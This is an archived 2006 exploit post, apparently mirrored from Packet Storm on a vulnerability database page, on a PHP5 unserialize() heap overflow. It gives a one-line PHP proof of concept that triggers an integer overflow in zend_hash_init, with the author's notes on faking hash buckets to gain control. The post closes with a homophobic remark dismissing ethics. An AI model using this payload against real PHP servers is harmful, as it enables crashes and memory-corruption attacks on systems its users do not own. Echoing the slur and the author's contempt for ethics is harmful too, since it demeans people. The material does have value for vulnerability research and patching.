Lucene search

php5-unserialize.txt

🗓️ 20 Oct 2006 00:00:00Reported by slythersType

packetstorm🔗 packetstormsecurity.com👁 18 Views

PHP5 Unserialize Heap Overflow Exploi

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`------=_Part_91297_20240413.1161096528744  
Content-Type: text/plain; charset=ISO-8859-1; format=flowed  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
<?  
  
print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));  
?>  
  
in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow  
here segfault in zend_hash_find() but it's possible to fake the bucket and  
exploit a zend_hash_del_index_or_key  
i tried a memory dump , just fake the bucked with the pointer of the  
$GLOBALS's bucket but segfault before in memory_shutdown...  
  
don't cry a river :P  
ethic is for gayz  
  
------=_Part_91297_20240413.1161096528744  
Content-Type: text/html; charset=ISO-8859-1  
Content-Transfer-Encoding: 7bit  
Content-Disposition: inline  
  
<?<br>&nbsp;&nbsp; &nbsp;print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));<br>?><br><br>in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow<br>here segfault in zend_hash_find() but it's possible to fake the bucket and exploit a zend_hash_del_index_or_key  
<br>i tried a memory dump , just fake the bucked with the pointer of the $GLOBALS's bucket but segfault before in memory_shutdown...<br><br>don't cry a river :P<br>ethic is for gayz<br><br>  
  
------=_Part_91297_20240413.1161096528744--  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

20 Oct 2006 00:00Current